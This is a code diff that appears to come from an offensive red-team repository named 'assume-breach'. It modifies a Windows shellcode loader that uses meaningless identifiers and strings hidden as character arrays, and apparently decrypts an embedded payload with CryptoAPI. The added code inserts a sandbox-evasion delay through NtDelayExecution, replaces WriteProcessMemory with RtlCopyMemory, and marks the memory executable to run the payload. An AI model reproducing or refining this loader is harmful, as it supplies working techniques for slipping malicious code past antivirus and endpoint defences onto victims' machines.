|
|
@@ -11,6 +11,25 @@
|
|
|
|
|
|
using Random6 = NTSTATUS(NTAPI*)();
|
|
|
|
|
|
+static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
|
|
|
+
|
|
|
+static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
|
|
|
+
|
|
|
+unsigned char sntdll[] = {'n','t','d','l','l', 0x0};
|
|
|
+unsigned char sNtA[] = {'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
|
|
|
+
|
|
|
+static void SleepShort(float milliseconds) {
|
|
|
+ static bool once = true;
|
|
|
+ if (once) {
|
|
|
+ ULONG actualResolution;
|
|
|
+ ZwSetTimerResolution(1, true, &actualResolution);
|
|
|
+ once = false;
|
|
|
+ }
|
|
|
+
|
|
|
+ LARGE_INTEGER interval;
|
|
|
+ interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
|
|
|
+ NtDelayExecution(false, &interval);
|
|
|
+}
|
|
|
|
|
|
int Random1(char * Random3, unsigned int Random3_len, char * Random2, int Random2len) {
|
|
|
HCRYPTPROV hProv;
|
|
|
@@ -56,11 +75,14 @@ int main()
|
|
|
SIZE_T Random4 = sizeof(Random3);
|
|
|
|
|
|
Random1((char *) Random3, Random3_len, Random2, sizeof(Random2));
|
|
|
-
|
|
|
+
|
|
|
LPVOID Random5 = VirtualAlloc(NULL, Random4, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
|
|
|
|
|
- WriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, NULL);
|
|
|
-
|
|
|
+ SleepShort(3000);
|
|
|
+
|
|
|
+ //WriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, NULL);
|
|
|
+ RtlCopyMemory(Random5, Random3, Random3_len);
|
|
|
+
|
|
|
VirtualProtect(Random5, Random3_len, PAGE_EXECUTE_READ, &oldprotect);
|
|
|
|
|
|
|
assume-breach